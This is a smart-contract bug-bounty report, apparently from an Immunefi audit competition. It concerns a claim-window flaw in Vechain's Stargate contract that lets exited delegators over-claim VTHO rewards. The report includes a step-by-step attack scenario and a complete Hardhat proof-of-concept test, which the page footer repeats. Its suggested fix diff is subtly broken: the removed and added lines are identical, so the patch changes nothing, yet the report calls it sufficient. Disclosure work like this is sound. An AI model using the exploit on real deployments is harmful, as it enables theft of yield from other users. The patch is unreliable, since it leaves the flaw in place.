59709 sc high post exit rewards overpayment theft of unclaimed yield due to misclamped claim window in stargate

Submitted on Nov 15th 2025 at 02:22:41 UTC by @Queerantagonism for Audit Comp | Vechain | Stargate Hayabusa

Report ID: #59709
Report Type: Smart Contract
Report severity: High
Target: https://github.com/immunefi-team/audit-comp-vechain-stargate-hayabusa/tree/main/packages/contracts/contracts/Stargate.sol
Impacts: Theft of unclaimed yield

Description

Exploitability: No special permissions required; any NFT owner following normal flows (delegate → request exit → wait → claim) can over-claim.

The private function _claimableDelegationPeriods determines the first and last claimable periods. For delegations that have ended, the intended logic is to clamp the last claimable period to endPeriod. However, the current condition enforces the clamp only when endPeriod > nextClaimablePeriod, thereby missing the equality case.

Excerpt (contracts/Stargate.sol):

if (
  endPeriod != type(uint32).max &&
  endPeriod < currentValidatorPeriod &&
  endPeriod > nextClaimablePeriod
) {
  return (nextClaimablePeriod, endPeriod);
}

When endPeriod == nextClaimablePeriod (a common case during exit in the first active period), the condition fails and the logic falls through to the “active” branch:

return (nextClaimablePeriod, completedPeriods);

This incorrectly includes post-exit periods, allowing claimableRewards to pay for future periods that should be excluded.

Faulty Flow

User delegates NFT to a validator

User delegates their NFT to a validator as normal.

User requests exit during their first active period

This makes endPeriod = current period.

Several validator periods complete

_claimableDelegationPeriods mistakenly returns lastClaimable = completedPeriods which extends beyond endPeriod.

_claimableRewards aggregates over the incorrect range

This causes overpayment to the user.

Attack Scenario

Delegate an NFT to a validator.

Request exit during the first active period (very realistic scenario).

Wait a few more periods.

Call claimRewards or claimableRewards and receive post-exit rewards.

This process can be repeated across many tokens, effectively stealing unclaimed yield and risking protocol reserves (VTHO depletion).

Proof of Concept

The PoC leverages the repository’s existing mocks (ProtocolStakerMock, StargateNFTMock) and deploys Stargate via its proxy, as required. It demonstrates:

lastClaimable > endPeriod (over-extended claim range)
Overpaid rewards = 0.15 ETH (0.05 for valid period 2 + 0.10 for invalid period 3)

Place file at: packages/contracts/test/unit/Stargate/POC_ClaimAfterExit.test.ts

import { expect } from "chai";
import { ethers } from "hardhat";

describe("PoC: Claim after exit still counts future period (overpayment)", function () {
  it("should show (first=2,last=3) and include rewards for period 3 after exit", async () => {
    const [admin, userA, userB] = await ethers.getSigners();

    // 1) Deploy mocks
    const ProtocolStakerMock = await ethers.getContractFactory("ProtocolStakerMock");
    const protocol = await ProtocolStakerMock.deploy();
    await protocol.waitForDeployment();

    const StargateNFTMock = await ethers.getContractFactory("StargateNFTMock");
    const nft = await StargateNFTMock.deploy();
    await nft.waitForDeployment();

    // 2) Configure NFT mock: 1e18 stake, factor=100 => effective=1e18
    const stake = ethers.parseEther("1");
    await nft.connect(admin).helper__setLevel({
      name: "Strength",
      isX: false,
      id: 1,
      maturityBlocks: 0,
      scaledRewardFactor: 100,
      vetAmountRequiredToStake: stake
    });
    await nft.connect(admin).helper__setToken({
      tokenId: 0,
      levelId: 1,
      mintedAtBlock: 0,
      vetAmountStaked: stake,
      lastVetGeneratedVthoClaimTimestamp_deprecated: 0
    });
    await nft.connect(admin).helper__setIsUnderMaturityPeriod(false);

    // 3) Link Clock + deploy Stargate impl
    const ClockLib = await ethers.getContractFactory("Clock");
    const clock = await ClockLib.deploy();
    await clock.waitForDeployment();

    const StargateImplFactory = await ethers.getContractFactory("Stargate", {
      libraries: {
        "contracts/StargateNFT/libraries/Clock.sol:Clock": await clock.getAddress()
      }
    });
    const stargateImpl = await StargateImplFactory.deploy();
    await stargateImpl.waitForDeployment();

    // 4) Deploy Proxy + init
    const initParams = {
      admin: admin.address,
      protocolStakerContract: await protocol.getAddress(),
      stargateNFTContract: await nft.getAddress(),
      maxClaimablePeriods: 832
    };
    const initData = StargateImplFactory.interface.encodeFunctionData("initialize", [initParams]);
    const Proxy = await ethers.getContractFactory("StargateProxy");
    const proxy = await Proxy.deploy(await stargateImpl.getAddress(), initData);
    await proxy.waitForDeployment();
    const stargate = await ethers.getContractAt("Stargate", await proxy.getAddress());

    await protocol.helper__setStargate(await stargate.getAddress());

    // 5) Validator ACTIVE + completed=0 + exitBlock=uint32.max
    const validator = ethers.Wallet.createRandom().address;
    await protocol.helper__setValidatorStatus(validator, 2); // ACTIVE
    await protocol.helper__setValidationCompletedPeriods(validator, 0);
    await protocol.helper__setValidationExitBlock(validator, 0xffffffff);

    // 6) Stake 2 NFTs (A, B)
    await stargate.connect(userA).stake(1, { value: stake });
    const tokenIdA = (await nft.getCurrentTokenId()) as unknown as bigint;

    await stargate.connect(userB).stake(1, { value: stake });
    const tokenIdB = (await nft.getCurrentTokenId()) as unknown as bigint;

    // 7) Delegate A, B
    await stargate.connect(userA).delegate(tokenIdA, validator);
    await stargate.connect(userB).delegate(tokenIdB, validator);

    // 8) current=2 (completed=1) => A request exit => end(A)=2
    await protocol.helper__setValidationCompletedPeriods(validator, 1);
    await stargate.connect(userA).requestDelegationExit(tokenIdA);

    // 9) current=4 (completed=3)
    await protocol.helper__setValidationCompletedPeriods(validator, 3);

    // 10) BUG: lastClaimable > end(A)
    const [firstClaimable, lastClaimable] = await stargate.claimableDelegationPeriods(tokenIdA);
    const delA = await stargate.getDelegationDetails(tokenIdA);
    const endA = delA.endPeriod;

    expect(firstClaimable).to.equal(2n);
    expect(endA).to.equal(2n);
    expect(lastClaimable).to.equal(3n);    // BUG: should be 2
    expect(lastClaimable).to.be.greaterThan(endA);

    // 11) Overpayment: mock returns 0.1 ETH/period.
    // Period 2: A gets 0.1/2 = 0.05 (two delegators)
    // Period 3: A gets full 0.1 (post-exit) => total 0.15
    const perPeriodReward = ethers.parseEther("0.1");
    const expectedP2Share = perPeriodReward / 2n;
    const expectedBuggedTotal = expectedP2Share + perPeriodReward; // 0.15
    const claimableA = await stargate.claimableRewards(tokenIdA);

    expect(claimableA).to.equal(expectedBuggedTotal);
    expect(claimableA).to.be.gt(expectedP2Share);
  });
});

Run:

npx hardhat test --network hardhat test/unit/Stargate/POC_ClaimAfterExit.test.ts

Output (observed):

PoC test passes.
lastClaimable = 3 while endPeriod = 2 (range exceeds end).
claimableRewards(tokenIdA) = 0.15 ETH (overpayment confirmed).

Fix

Goal: Clamp claimable range to endPeriod for delegations that have ended.

Suggested patch in contracts/Stargate.sol for _claimableDelegationPeriods:

function _claimableDelegationPeriods(
  StargateStorage storage $,
  uint256 _tokenId
) private view returns (uint32, uint32) {
  // ... existing code computing:
  //  - startPeriod, endPeriod
  //  - completedPeriods, currentValidatorPeriod
  //  - nextClaimablePeriod = lastClaimed + 1 (clamped to startPeriod)

  // FIX: clamp last to endPeriod whenever the delegation has ended
-  if (endPeriod != type(uint32).max && endPeriod < currentValidatorPeriod) {
-    if (nextClaimablePeriod <= endPeriod) {
-      return (nextClaimablePeriod, endPeriod);
-    } else {
-      return (0, 0);
-    }
-  }
+  if (endPeriod != type(uint32).max && endPeriod < currentValidatorPeriod) {
+    if (nextClaimablePeriod <= endPeriod) {
+      return (nextClaimablePeriod, endPeriod);
+    } else {
+      return (0, 0);
+    }
+  }

  // Active or still ongoing periods
  if (nextClaimablePeriod < currentValidatorPeriod) {
    return (nextClaimablePeriod, completedPeriods);
  }

  return (0, 0);
}

(Primary change: ensure the ended-delegation branch triggers whenever endPeriod < currentValidatorPeriod — and handle equality where nextClaimablePeriod == endPeriod by returning (nextClaimablePeriod, endPeriod) — avoiding falling through to the active branch.)

Why This Fix Is Sufficient

claimRewards and claimableRewards rely solely on the range returned by _claimableDelegationPeriods.
Clamping ensures post-exit periods are excluded, eliminating overpayment.
The equality case (endPeriod == nextClaimablePeriod) is now properly treated as ended, preventing invalid fallthrough.
The fix is minimal, interface-compatible, and aligns with reward semantics: no rewards after endPeriod.

Previous59665 sc high delegators can claim rewards beyond delegation end Next59723 sc high double decrease after exit validator exited leads to underflow and permanent freeze

Was this helpful?

import { expect } from "chai"; import { ethers } from "hardhat"; describe("PoC: Claim after exit still counts future period (overpayment)", function () { it("should show (first=2,last=3) and include rewards for period 3 after exit", async () => { const [admin, userA, userB] = await ethers.getSigners(); // 1) Deploy mocks const ProtocolStakerMock = await ethers.getContractFactory("ProtocolStakerMock"); const protocol = await ProtocolStakerMock.deploy(); await protocol.waitForDeployment(); const StargateNFTMock = await ethers.getContractFactory("StargateNFTMock"); const nft = await StargateNFTMock.deploy(); await nft.waitForDeployment(); // 2) Configure NFT mock: 1e18 stake, factor=100 => effective=1e18 const stake = ethers.parseEther("1"); await nft.connect(admin).helper__setLevel({ name: "Strength", isX: false, id: 1, maturityBlocks: 0, scaledRewardFactor: 100, vetAmountRequiredToStake: stake }); await nft.connect(admin).helper__setToken({ tokenId: 0, levelId: 1, mintedAtBlock: 0, vetAmountStaked: stake, lastVetGeneratedVthoClaimTimestamp_deprecated: 0 }); await nft.connect(admin).helper__setIsUnderMaturityPeriod(false); // 3) Link Clock + deploy Stargate impl const ClockLib = await ethers.getContractFactory("Clock"); const clock = await ClockLib.deploy(); await clock.waitForDeployment(); const StargateImplFactory = await ethers.getContractFactory("Stargate", { libraries: { "contracts/StargateNFT/libraries/Clock.sol:Clock": await clock.getAddress() } }); const stargateImpl = await StargateImplFactory.deploy(); await stargateImpl.waitForDeployment(); // 4) Deploy Proxy + init const initParams = { admin: admin.address, protocolStakerContract: await protocol.getAddress(), stargateNFTContract: await nft.getAddress(), maxClaimablePeriods: 832 }; const initData = StargateImplFactory.interface.encodeFunctionData("initialize", [initParams]); const Proxy = await ethers.getContractFactory("StargateProxy"); const proxy = await Proxy.deploy(await stargateImpl.getAddress(), initData); await proxy.waitForDeployment(); const stargate = await ethers.getContractAt("Stargate", await proxy.getAddress()); await protocol.helper__setStargate(await stargate.getAddress()); // 5) Validator ACTIVE + completed=0 + exitBlock=uint32.max const validator = ethers.Wallet.createRandom().address; await protocol.helper__setValidatorStatus(validator, 2); // ACTIVE await protocol.helper__setValidationCompletedPeriods(validator, 0); await protocol.helper__setValidationExitBlock(validator, 0xffffffff); // 6) Stake 2 NFTs (A, B) await stargate.connect(userA).stake(1, { value: stake }); const tokenIdA = (await nft.getCurrentTokenId()) as unknown as bigint; await stargate.connect(userB).stake(1, { value: stake }); const tokenIdB = (await nft.getCurrentTokenId()) as unknown as bigint; // 7) Delegate A, B await stargate.connect(userA).delegate(tokenIdA, validator); await stargate.connect(userB).delegate(tokenIdB, validator); // 8) current=2 (completed=1) => A request exit => end(A)=2 await protocol.helper__setValidationCompletedPeriods(validator, 1); await stargate.connect(userA).requestDelegationExit(tokenIdA); // 9) current=4 (completed=3) await protocol.helper__setValidationCompletedPeriods(validator, 3); // 10) BUG: lastClaimable > end(A) const [firstClaimable, lastClaimable] = await stargate.claimableDelegationPeriods(tokenIdA); const delA = await stargate.getDelegationDetails(tokenIdA); const endA = delA.endPeriod; expect(firstClaimable).to.equal(2n); expect(endA).to.equal(2n); expect(lastClaimable).to.equal(3n); // BUG: should be 2 expect(lastClaimable).to.be.greaterThan(endA); // 11) Overpayment: mock returns 0.1 ETH/period. // Period 2: A gets 0.1/2 = 0.05 (two delegators) // Period 3: A gets full 0.1 (post-exit) => total 0.15 const perPeriodReward = ethers.parseEther("0.1"); const expectedP2Share = perPeriodReward / 2n; const expectedBuggedTotal = expectedP2Share + perPeriodReward; // 0.15 const claimableA = await stargate.claimableRewards(tokenIdA); expect(claimableA).to.equal(expectedBuggedTotal); expect(claimableA).to.be.gt(expectedP2Share); }); });

hashtagDescription

hashtagFaulty Flow

hashtagUser delegates NFT to a validator

hashtagUser requests exit during their first active period

hashtagSeveral validator periods complete

hashtag_claimableRewards aggregates over the incorrect range

hashtagAttack Scenario

hashtagProof of Concept

hashtagFix

hashtagWhy This Fix Is Sufficient